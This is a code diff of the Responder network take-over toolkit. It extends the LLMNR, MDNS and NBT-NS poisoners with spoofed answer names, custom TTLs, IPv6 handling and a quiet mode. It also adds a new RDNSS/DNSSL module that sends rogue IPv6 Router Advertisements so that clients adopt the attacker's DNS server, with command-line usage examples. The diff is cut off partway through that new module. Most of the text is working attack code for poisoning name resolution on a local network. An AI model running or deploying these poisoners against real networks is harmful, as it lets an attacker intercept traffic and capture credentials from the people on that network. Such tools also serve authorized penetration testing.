SecBlobLen = str(self.fields["InitContextTokenASNId"])+str(self.fields["InitContextTokenASNLen"])+str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
AsnLenStart = str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
AsnLenStart = str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
AsnLen2 = str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
AsnLen2 = str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
MechTypeLen = str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])
MechTypeLen = str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])
Tag3Len = str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
@@ -1755,7 +1809,7 @@ class SMB2NegoAns(Packet):
self.fields["NegTokenASNLen"] = StructWithLenPython2or3("<B", len(AsnLen2)-2)
self.fields["NegTokenTag0ASNLen"] = StructWithLenPython2or3("<B", len(MechTypeLen))
self.fields["NegThisMechASNLen"] = StructWithLenPython2or3("<B", len(MechTypeLen)-2)
self.fields["NegThisMech1ASNLen"] = StructWithLenPython2or3("<B", len(str(self.fields["NegThisMech1ASNStr"])))
#self.fields["NegThisMech1ASNLen"] = StructWithLenPython2or3("<B", len(str(self.fields["NegThisMech1ASNStr"])))
self.fields["NegThisMech2ASNLen"] = StructWithLenPython2or3("<B", len(str(self.fields["NegThisMech2ASNStr"])))
self.fields["NegThisMech3ASNLen"] = StructWithLenPython2or3("<B", len(str(self.fields["NegThisMech3ASNStr"])))
self.fields["NegThisMech4ASNLen"] = StructWithLenPython2or3("<B", len(str(self.fields["NegThisMech4ASNStr"])))
@@ -2291,113 +2345,3 @@ class RPCNTLMNego(Packet):
self.fields["FragLen"] = StructWithLenPython2or3("<h",len(Data))
################### Mailslot NETLOGON ######################
class NBTUDPHeader(Packet):
fields = OrderedDict([
("MessType", "\x11"),
("MoreFrag", "\x02"),
("TID", "\x82\x92"),
("SrcIP", "0.0.0.0"),
("SrcPort", "\x00\x8a"), ##Always 138
("DatagramLen", "\x00\x00"),
("PacketOffset", "\x00\x00"),
("ClientNBTName", ""),
("DstNBTName", ""),
("Data", ""),
])
def calculate(self):
self.fields["SrcIP"] = RespondWithIPAton()
## DatagramLen.
DataGramLen = str(self.fields["PacketOffset"])+str(self.fields["ClientNBTName"])+str(self.fields["DstNBTName"])+str(self.fields["Data"])
self.fields["DatagramLen"] = StructWithLenPython2or3(">h",len(DataGramLen))
class SMBTransMailslot(Packet):
fields = OrderedDict([
("Wordcount", "\x11"),
("TotalParamCount", "\x00\x00"),
("TotalDataCount", "\x00\x00"),
("MaxParamCount", "\x02\x00"),
("MaxDataCount", "\x00\x00"),
("MaxSetupCount", "\x00"),
("Reserved", "\x00"),
("Flags", "\x00\x00"),
("Timeout", "\xff\xff\xff\xff"),
("Reserved2", "\x00\x00"),
("ParamCount", "\x00\x00"),
("ParamOffset", "\x00\x00"),
("DataCount", "\x00\x00"),
("DataOffset", "\x00\x00"),
("SetupCount", "\x03"),
("Reserved3", "\x00"),
("Opcode", "\x01\x00"),
("Priority", "\x00\x00"),
("Class", "\x02\x00"),
("Bcc", "\x00\x00"),
("MailSlot", "\\MAILSLOT\\NET\\NETLOGON"),
("MailSlotNull", "\x00"),
("Padding", "\x00\x00\x00"),
("Data", ""),
])
def calculate(self):
#Padding
if len(str(self.fields["Data"]))%2==0:
self.fields["Padding"] = "\x00\x00\x00\x00"
else:
self.fields["Padding"] = "\x00\x00\x00"
BccLen = str(self.fields["MailSlot"])+str(self.fields["MailSlotNull"])+str(self.fields["Padding"])+str(self.fields["Data"])
PacketOffsetLen = str(self.fields["Wordcount"])+str(self.fields["TotalParamCount"])+str(self.fields["TotalDataCount"])+str(self.fields["MaxParamCount"])+str(self.fields["MaxDataCount"])+str(self.fields["MaxSetupCount"])+str(self.fields["Reserved"])+str(self.fields["Flags"])+str(self.fields["Timeout"])+str(self.fields["Reserved2"])+str(self.fields["ParamCount"])+str(self.fields["ParamOffset"])+str(self.fields["DataCount"])+str(self.fields["DataOffset"])+str(self.fields["SetupCount"])+str(self.fields["Reserved3"])+str(self.fields["Opcode"])+str(self.fields["Priority"])+str(self.fields["Class"])+str(self.fields["Bcc"])+str(self.fields["MailSlot"])+str(self.fields["MailSlotNull"])+str(self.fields["Padding"])
self.fields["DataCount"] = StructWithLenPython2or3("<h",len(str(self.fields["Data"])))
self.fields["TotalDataCount"] = StructWithLenPython2or3("<h",len(str(self.fields["Data"])))
self.fields["DataOffset"] = StructWithLenPython2or3("<h",len(PacketOffsetLen)+32)
self.fields["ParamOffset"] = StructWithLenPython2or3("<h",len(PacketOffsetLen)+32)
self.fields["Bcc"] = StructWithLenPython2or3("<h",len(BccLen))
class SamLogonResponseEx(Packet):
fields = OrderedDict([
("Cmd", "\x17\x00"),
("Sbz", "\x00\x00"),
("Flags", "\xfd\x03\x00\x00"),
("DomainGUID", "\xe7\xfd\xf2\x4a\x4f\x98\x8b\x49\xbb\xd3\xcd\x34\xc7\xba\x57\x70"),
("ForestName", "\x04\x73\x6d\x62\x33\x05\x6c\x6f\x63\x61\x6c"),
("ForestNameNull", "\x00"),
("ForestDomainName", "\x04\x73\x6d\x62\x33\x05\x6c\x6f\x63\x61\x6c"),
("ForestDomainNull", "\x00"),
("DNSName", "\x0a\x73\x65\x72\x76\x65\x72\x32\x30\x30\x33"),
("DNSPointer", "\xc0\x18"),
("DomainName", "\x04\x53\x4d\x42\x33"),
("DomainTerminator", "\x00"),
("ServerLen", "\x0a"),
("ServerName", settings.Config.MachineName),
("ServerTerminator", "\x00"),
("UsernameLen", "\x10"),
("Username", settings.Config.Username),
("UserTerminator", "\x00"),
("SrvSiteNameLen", "\x17"),
("SrvSiteName", "Default-First-Site-Name"),
("SrvSiteNameNull", "\x00"),
("Pointer", "\xc0"),
("PointerOffset", "\x5c"),
("DCAddrSize", "\x10"),
("AddrType", "\x02\x00"),
("Port", "\x00\x00"),
("DCAddress", "\xc0\xab\x01\x65"),
("SinZero", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("Version", "\x0d\x00\x00\x00"),
("LmToken", "\xff\xff"),
("LmToken2", "\xff\xff"),
])
def calculate(self):
Offset = str(self.fields["Cmd"])+str(self.fields["Sbz"])+str(self.fields["Flags"])+str(self.fields["DomainGUID"])+str(self.fields["ForestName"])+str(self.fields["ForestNameNull"])+str(self.fields["ForestDomainName"])+str(self.fields["ForestDomainNull"])+str(self.fields["DNSName"])+str(self.fields["DNSPointer"])+str(self.fields["DomainName"])+str(self.fields["DomainTerminator"])+str(self.fields["ServerLen"])+str(self.fields["ServerName"])+str(self.fields["ServerTerminator"])+str(self.fields["UsernameLen"])+str(self.fields["Username"])+str(self.fields["UserTerminator"])
DcLen = str(self.fields["AddrType"])+str(self.fields["Port"])+str(self.fields["DCAddress"])+str(self.fields["SinZero"])
self.fields["DCAddress"] = RespondWithIPAton()
self.fields["ServerLen"] = StructWithLenPython2or3("<B",len(str(self.fields["ServerName"])))
self.fields["UsernameLen"] = StructWithLenPython2or3("<B",len(str(self.fields["Username"])))
self.fields["SrvSiteNameLen"] = StructWithLenPython2or3("<B",len(str(self.fields["SrvSiteName"])))
self.fields["DCAddrSize"] = StructWithLenPython2or3("<B",len(DcLen))
self.fields["PointerOffset"] = StructWithLenPython2or3("<B",len(Offset))

10
poisoners/DHCP.py
View File

@@ -239,9 +239,13 @@ def ParseSrcDSTAddr(data):
return SrcIP, SrcPort, DstIP, DstPort
def FindIP(data):
data = data.decode('latin-1')
IP = ''.join(re.findall(r'(?<=\x32\x04)[^EOF]*', data))
return ''.join(IP[0:4]).encode('latin-1')
IPPos = data.find(b"\x32\x04") + 2
if IPPos == -1 or IPPos + 4 >= len(data) or IPPos == 1:
#Probably not present in the DHCP options we received, let's grab it from the IP header instead
return data[12:16]
else:
IP = data[IPPos:IPPos+4]
return IP
def ParseDHCPCode(data, ClientIP,DHCP_DNS):
global DHCPClient

37
poisoners/LLMNR.py
View File

@@ -22,6 +22,9 @@ if (sys.version_info > (3, 0)):
else:
from SocketServer import BaseRequestHandler
#Should we answer to those AAAA?
Have_IPv6 = settings.Config.IPv6
def Parse_LLMNR_Name(data):
import codecs
NameLen = data[12]
@@ -41,7 +44,7 @@ def IsICMPRedirectPlausible(IP):
elif ip[0] == 'nameserver':
dnsip.extend(ip[1:])
for x in dnsip:
if x != "127.0.0.1" and IsOnTheSameSubnet(x,IP) is False:
if x != "127.0.0.1" and IsIPv6IP(x) is False and IsOnTheSameSubnet(x,IP) is False: #Temp fix to ignore IPv6 DNS addresses
print(color("[Analyze mode: ICMP] You can ICMP Redirect on this network.", 5))
print(color("[Analyze mode: ICMP] This workstation (%s) is not on the same subnet than the DNS server (%s)." % (IP, x), 5))
print(color("[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.", 5))
@@ -55,6 +58,10 @@ class LLMNR(BaseRequestHandler): # LLMNR Server class
try:
data, soc = self.request
Name = Parse_LLMNR_Name(data).decode("latin-1")
if settings.Config.AnswerName is None:
AnswerName = Name
else:
AnswerName = settings.Config.AnswerName
LLMNRType = Parse_IPV6_Addr(data)
# Break out if we don't want to respond to this host
@@ -64,7 +71,9 @@ class LLMNR(BaseRequestHandler): # LLMNR Server class
if data[2:4] == b'\x00\x00' and LLMNRType:
if settings.Config.AnalyzeMode:
LineHeader = "[Analyze mode: LLMNR]"
print(color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1))
# Don't print if in Quiet Mode
if not settings.Config.Quiet_Mode:
print(color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1))
SavePoisonersToDb({
'Poisoner': 'LLMNR',
'SentToIp': self.client_address[0],
@@ -73,12 +82,19 @@ class LLMNR(BaseRequestHandler): # LLMNR Server class
})
elif LLMNRType == True: # Poisoning Mode
Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name)
#Default:
if settings.Config.TTL == None:
Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=AnswerName)
else:
Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=AnswerName, TTL=settings.Config.TTL)
Buffer1.calculate()
soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
if not settings.Config.Quiet_Mode:
LineHeader = "[*] [LLMNR]"
print(color("%s Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1))
if settings.Config.AnswerName is None:
print(color("%s Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1))
else:
print(color("%s Poisoned answer sent to %s for name %s (spoofed answer name %s)" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name, AnswerName), 2, 1))
SavePoisonersToDb({
'Poisoner': 'LLMNR',
'SentToIp': self.client_address[0],
@@ -86,13 +102,20 @@ class LLMNR(BaseRequestHandler): # LLMNR Server class
'AnalyzeMode': '0',
})
elif LLMNRType == 'IPv6':
Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name)
elif LLMNRType == 'IPv6' and Have_IPv6:
#Default:
if settings.Config.TTL == None:
Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=AnswerName)
else:
Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=AnswerName, TTL=settings.Config.TTL)
Buffer1.calculate()
soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
if not settings.Config.Quiet_Mode:
LineHeader = "[*] [LLMNR]"
print(color("%s Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1))
if settings.Config.AnswerName is None:
print(color("%s Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1))
else:
print(color("%s Poisoned answer sent to %s for name %s (spoofed answer name %s)" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name, AnswerName), 2, 1))
SavePoisonersToDb({
'Poisoner': 'LLMNR6',
'SentToIp': self.client_address[0],

73
poisoners/MDNS.py
View File

@@ -23,6 +23,9 @@ else:
from packets import MDNS_Ans, MDNS6_Ans
from utils import *
#Should we answer to those AAAA?
Have_IPv6 = settings.Config.IPv6
def Parse_MDNS_Name(data):
try:
if (sys.version_info > (3, 0)):
@@ -51,47 +54,59 @@ def Poisoned_MDNS_Name(data):
class MDNS(BaseRequestHandler):
def handle(self):
data, soc = self.request
Request_Name = Parse_MDNS_Name(data)
MDNSType = Parse_IPV6_Addr(data)
# Break out if we don't want to respond to this host
try:
data, soc = self.request
Request_Name = Parse_MDNS_Name(data)
MDNSType = Parse_IPV6_Addr(data)
# Break out if we don't want to respond to this host
if (not Request_Name) or (RespondToThisHost(self.client_address[0].replace("::ffff:",""), Request_Name) is not True):
return None
if (not Request_Name) or (RespondToThisHost(self.client_address[0].replace("::ffff:",""), Request_Name) is not True):
return None
if settings.Config.AnalyzeMode: # Analyze Mode
print(text('[Analyze mode: MDNS] Request by %-15s for %s, ignoring' % (color(self.client_address[0].replace("::ffff:",""), 3), color(Request_Name, 3))))
SavePoisonersToDb({
if settings.Config.AnalyzeMode: # Analyze Mode
# Don't print if in Quiet Mode
if not settings.Config.Quiet_Mode:
print(text('[Analyze mode: MDNS] Request by %-15s for %s, ignoring' % (color(self.client_address[0].replace("::ffff:",""), 3), color(Request_Name, 3))))
SavePoisonersToDb({
'Poisoner': 'MDNS',
'SentToIp': self.client_address[0],
'ForName': Request_Name,
'AnalyzeMode': '1',
})
elif MDNSType == True: # Poisoning Mode
Poisoned_Name = Poisoned_MDNS_Name(data)
Buffer = MDNS_Ans(AnswerName = Poisoned_Name)
Buffer.calculate()
soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address)
if not settings.Config.Quiet_Mode:
print(color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0].replace("::ffff:",""), Request_Name), 2, 1))
SavePoisonersToDb({
})
elif MDNSType == True: # Poisoning Mode
Poisoned_Name = Poisoned_MDNS_Name(data)
#Use default:
if settings.Config.TTL == None:
Buffer = MDNS_Ans(AnswerName = Poisoned_Name)
else:
Buffer = MDNS_Ans(AnswerName = Poisoned_Name, TTL=settings.Config.TTL)
Buffer.calculate()
soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address)
if not settings.Config.Quiet_Mode:
print(color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0].replace("::ffff:",""), Request_Name), 2, 1))
SavePoisonersToDb({
'Poisoner': 'MDNS',
'SentToIp': self.client_address[0],
'ForName': Request_Name,
'AnalyzeMode': '0',
})
})
elif MDNSType == 'IPv6': # Poisoning Mode
Poisoned_Name = Poisoned_MDNS_Name(data)
Buffer = MDNS6_Ans(AnswerName = Poisoned_Name)
Buffer.calculate()
soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address)
if not settings.Config.Quiet_Mode:
print(color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0].replace("::ffff:",""), Request_Name), 2, 1))
SavePoisonersToDb({
elif MDNSType == 'IPv6' and Have_IPv6: # Poisoning Mode
Poisoned_Name = Poisoned_MDNS_Name(data)
#Use default:
if settings.Config.TTL == None:
Buffer = MDNS6_Ans(AnswerName = Poisoned_Name)
else:
Buffer = MDNS6_Ans(AnswerName = Poisoned_Name, TTL= settings.Config.TTL)
Buffer.calculate()
soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address)
if not settings.Config.Quiet_Mode:
print(color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0].replace("::ffff:",""), Request_Name), 2, 1))
SavePoisonersToDb({
'Poisoner': 'MDNS6',
'SentToIp': self.client_address[0],
'ForName': Request_Name,
'AnalyzeMode': '0',
})
})
except:
raise

47
poisoners/NBTNS.py
View File

@@ -27,33 +27,40 @@ else:
class NBTNS(BaseRequestHandler):
def handle(self):
try:
data, socket = self.request
Name = Decode_Name(NetworkRecvBufferPython2or3(data[13:45]))
# Break out if we don't want to respond to this host
if RespondToThisHost(self.client_address[0].replace("::ffff:",""), Name) is not True:
return None
data, socket = self.request
Name = Decode_Name(NetworkRecvBufferPython2or3(data[13:45]))
# Break out if we don't want to respond to this host
if RespondToThisHost(self.client_address[0].replace("::ffff:",""), Name) is not True:
return None
if data[2:4] == b'\x01\x10':
if settings.Config.AnalyzeMode: # Analyze Mode
print(text('[Analyze mode: NBT-NS] Request by %-15s for %s, ignoring' % (color(self.client_address[0].replace("::ffff:",""), 3), color(Name, 3))))
SavePoisonersToDb({
if data[2:4] == b'\x01\x10':
if settings.Config.AnalyzeMode: # Analyze Mode
# Don't print if in Quiet Mode
if not settings.Config.Quiet_Mode:
print(text('[Analyze mode: NBT-NS] Request by %-15s for %s, ignoring' % (color(self.client_address[0].replace("::ffff:",""), 3), color(Name, 3))))
SavePoisonersToDb({
'Poisoner': 'NBT-NS',
'SentToIp': self.client_address[0],
'ForName': Name,
'AnalyzeMode': '1',
})
else: # Poisoning Mode
Buffer1 = NBT_Ans()
Buffer1.calculate(data)
socket.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
if not settings.Config.Quiet_Mode:
LineHeader = "[*] [NBT-NS]"
print(color("%s Poisoned answer sent to %s for name %s (service: %s)" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name, NBT_NS_Role(NetworkRecvBufferPython2or3(data[43:46]))), 2, 1))
SavePoisonersToDb({
})
else: # Poisoning Mode
if settings.Config.TTL == None:
Buffer1 = NBT_Ans()
else:
Buffer1 = NBT_Ans(TTL=settings.Config.TTL)
Buffer1.calculate(data)
socket.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
if not settings.Config.Quiet_Mode:
LineHeader = "[*] [NBT-NS]"
print(color("%s Poisoned answer sent to %s for name %s (service: %s)" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name, NBT_NS_Role(NetworkRecvBufferPython2or3(data[43:46]))), 2, 1))
SavePoisonersToDb({
'Poisoner': 'NBT-NS',
'SentToIp': self.client_address[0],
'ForName': Name,
'AnalyzeMode': '0',
})
})
except:
raise

357
poisoners/RDNSS.py Normal file
View File

@@ -0,0 +1,357 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
RDNSS/DNSSL Poisoner - DNS Router Advertisement Options (RFC 8106)
Sends IPv6 Router Advertisements with:
- RDNSS (Recursive DNS Server) option - advertises Responder as DNS server
- DNSSL (DNS Search List) option - injects DNS search suffix
Both options are independent and can be used separately or together.
This causes IPv6-enabled clients to:
- Use Responder's DNS server for name resolution (RDNSS)
- Append search suffix to unqualified names (DNSSL)
Usage:
python Responder.py -I eth0 --rdnss -v # RDNSS only
python Responder.py -I eth0 --dnssl corp.local -v # DNSSL only
python Responder.py -I eth0 --rdnss --dnssl corp.local -v # Both
"""
import socket
import struct
import random
import time
import signal
from utils import *
# ICMPv6 Constants
ICMPV6_ROUTER_ADVERTISEMENT = 134
ICMPV6_HOP_LIMIT = 255
# DNS RA Option Types (RFC 8106)
ND_OPT_RDNSS = 25 # Recursive DNS Server
ND_OPT_DNSSL = 31 # DNS Search List
# IPv6 All-Nodes Multicast Address
IPV6_ALL_NODES = "ff02::1"
# RA Timing (seconds)
RA_INTERVAL_MIN = 30
RA_INTERVAL_MAX = 120
RA_LIFETIME = 1800 # 30 minutes
class RDNSSOption:
"""Recursive DNS Server Option (Type 25)"""
def __init__(self, dns_servers, lifetime=RA_LIFETIME):
self.dns_servers = dns_servers if isinstance(dns_servers, list) else [dns_servers]
self.lifetime = lifetime
def build(self):
if not self.dns_servers:
return b''
addresses = b''
for server in self.dns_servers:
addresses += socket.inet_pton(socket.AF_INET6, server)
# Length in units of 8 octets: 1 (header) + 2 * num_addresses
length = 1 + (2 * len(self.dns_servers))
header = struct.pack(
'!BBHI',
ND_OPT_RDNSS,
length,
0, # Reserved
self.lifetime
)
return header + addresses
class DNSSLOption:
"""DNS Search List Option (Type 31)"""
def __init__(self, domains, lifetime=RA_LIFETIME):
self.domains = domains if isinstance(domains, list) else [domains]
self.lifetime = lifetime
@staticmethod
def encode_domain(domain):
"""Encode domain name in DNS wire format (RFC 1035)."""
encoded = b''
for label in domain.rstrip('.').split('.'):
label_bytes = label.encode('ascii')
encoded += bytes([len(label_bytes)]) + label_bytes
encoded += b'\x00' # Root label
return encoded
def build(self):
if not self.domains:
return b''
domain_data = b''
for domain in self.domains:
domain_data += self.encode_domain(domain)
# Pad to 8-octet boundary
header_size = 8
total_size = header_size + len(domain_data)
padding_needed = (8 - (total_size % 8)) % 8
domain_data += b'\x00' * padding_needed
length = (header_size + len(domain_data)) // 8
header = struct.pack(
'!BBHI',
ND_OPT_DNSSL,
length,
0, # Reserved
self.lifetime
)
return header + domain_data
class RouterAdvertisement:
"""ICMPv6 Router Advertisement Message"""
def __init__(self, rdnss=None, dnssl=None, managed=False, other=False, router_lifetime=0):
self.cur_hop_limit = 64
self.managed_flag = managed
self.other_flag = other
self.router_lifetime = router_lifetime # 0 = not a default router
self.reachable_time = 0
self.retrans_timer = 0
self.rdnss = rdnss
self.dnssl = dnssl
def build(self):
flags = 0
if self.managed_flag:
flags |= 0x80
if self.other_flag:
flags |= 0x40
ra_header = struct.pack(
'!BBHBBHII',
